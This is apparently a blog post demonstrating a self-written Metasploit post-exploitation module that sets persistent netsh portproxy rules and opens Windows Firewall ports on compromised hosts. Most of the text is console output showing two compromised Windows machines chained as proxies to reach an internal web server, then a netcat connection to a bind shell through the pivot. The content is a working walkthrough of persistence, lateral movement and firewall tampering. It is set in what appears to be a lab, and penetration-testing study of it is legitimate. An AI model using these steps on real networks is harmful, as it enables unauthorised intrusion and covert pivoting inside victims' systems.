Metasploit: Chain of proxies with PortProxy module

Portfwd is a well known feature to allow us to do port forwarding from our Meterpreter session. I think it goes without saying all the possibilities it provides. However, since this feature is part of Meterpreter (running directly from memory), once we exit our session we could not make use of it.
For this reason I made a little post-exploitation module that lets me configure forwarding rules persistently. Thus once I exit my shell I could use the compromised machine as a proxy and I won’t have to worry about getting a meterpreter shell to pivot to other hosts. To do this, the script uses the portproxy interface from netsh to set up a port forwarding rule. Then it enables the given local port in the firewall to allow the inbound TCP connection. Although it’s more noisier than Portfwd I think it may be useful in some scenarios.

In the following example we’ll use two compromised hosts with Meterpreter as a chain of proxies to connect to the web server 192.168.1.35.

msf post(portproxy) > sessions -l
Active sessions
===============
Id  Type                   Information                      Connection
—  —-                   ———–                      ———-
1   meterpreter x86/win32  KRYPTON\felipe @ KRYPTON  192.168.1.82:4444 -> 192.168.1.131:1516 (192.168.1.131)
3   meterpreter x86/win32  MORDOR\Test @ MORDOR     192.168.1.82:4444 -> 192.168.1.104:1040 (192.168.1.104)
msf post(portproxy) > set session 3
session => 3
msf post(portproxy) > set local_port 9001
local_port => 9001
msf post(portproxy) > set local_address 0.0.0.0
local_address => 0.0.0.0
msf post(portproxy) > set connect_port 9002
connect_port => 9002
msf post(portproxy) > set connect_address 192.168.1.131
connect_address => 192.168.1.131
msf post(portproxy) > run
[*] IPv6 is already installed.
[*] Setting PortProxy …
[+] PortProxy added.
[*] Port Forwarding Table
=====================
LOCAL IP  LOCAL PORT  REMOTE IP       REMOTE PORT
——–  ———-  ———       ———–
0.0.0.0   6543        192.168.1.82    8888
0.0.0.0   8888        192.168.1.65    5555
0.0.0.0   9001        192.168.1.131   9002
[*] Setting port 9001 in Windows Firewall …
[+] Port opened in Windows Firewall.
[*] Post module execution completed
msf post(portproxy) > set session 1
session => 1
msf post(portproxy) > set local_port 9002
local_port => 9002
msf post(portproxy) > set local_address 0.0.0.0
local_address => 0.0.0.0
msf post(portproxy) > set connect_port 80
connect_port => 80
msf post(portproxy) > set connect_address 192.168.1.35
connect_address => 192.168.1.35
msf post(portproxy) > show options
Module options (post/windows/manage/portproxy):
Name   Current Setting  Required  Description
—-     —————  ——–  ———–
CONNECT_ADDRESS    192.168.1.35    yes   IPv4/IPv6 address to which to connect.
CONNECT_PORT                            80    yes    Port number to which to connect.
IPV6_XP                                          true    yes    Install IPv6 on Windows XP (needed for       v4tov4).
LOCAL_ADDRESS                   0.0.0.0     yes    IPv4/IPv6 address to which to listen.
LOCAL_PORT                              9002    yes    Port number to which to listen.
SESSION                                            3     yes    The session to run this module on.
TYPE                                           v4tov4     yes   Type of forwarding (v4tov4, v6tov6, v6tov4,  v4tov6)
msf post(portproxy) > run
[*] Installing IPv6… can take a little long
[+] IPv6 was successfully installed.
[*] Setting PortProxy …

[*] Port Forwarding Table

=====================
LOCAL IP       LOCAL PORT  REMOTE IP      REMOTE PORT
——–       ———-  ———      ———–
0.0.0.0        3333        192.168.1.82   4567
0.0.0.0        9002        192.168.1.35   80

[*] Setting port 9002 in Windows Firewall …
[+] Port opened in Windows Firewall.
[*] Post module execution completed
The IPv6_XP datastore variable is needed for Windows XP. Because of a bug, you need to install the IPv6 interface (disabled by default) in your Windows XP installation to let you setup a proxy rule; even if you want to make a proxy that maps IPv4 to IPv4 connections (v4tov4); this was the case of 192.168.1.131.
Now we can try the connection:

root@felipe:/tmp# wget –server-response –spider 192.168.1.104:9001
Modo arácnido activado. Comprobar si el fichero remoto existe.
–2013-08-29 15:07:26–  http://192.168.1.104:9001/
Conectando con 192.168.1.104:9001… conectado.
Petición HTTP enviada, esperando respuesta…
HTTP/1.1 200 OK
Server: BadBlue/2.7
Content-Type: text/html
Accept-Ranges: bytes
Date: Thu, 29 Aug 2013 13:11:31 GMT
ETag: “3f45655a7512d8b6:43d”
Last-Modified: Fri, 22 Aug 2003 00:35:38 GMT
Content-Length: 1085
Connection: close
Cache-control: public
Longitud: 1085 (1,1K) [text/html]
This is also a good way to run bind shells in no unreachable hosts.
root@felipe:/tmp#  nc 192.168.1.104 9001
Microsoft Windows XP [Versi�n 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.
C:\Documents and Settings\Lab>\(‘-‘)/

Advertisements

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out / Change )

Twitter picture

You are commenting using your Twitter account. Log Out / Change )

Facebook photo

You are commenting using your Facebook account. Log Out / Change )

Google+ photo

You are commenting using your Google+ account. Log Out / Change )

Connecting to %s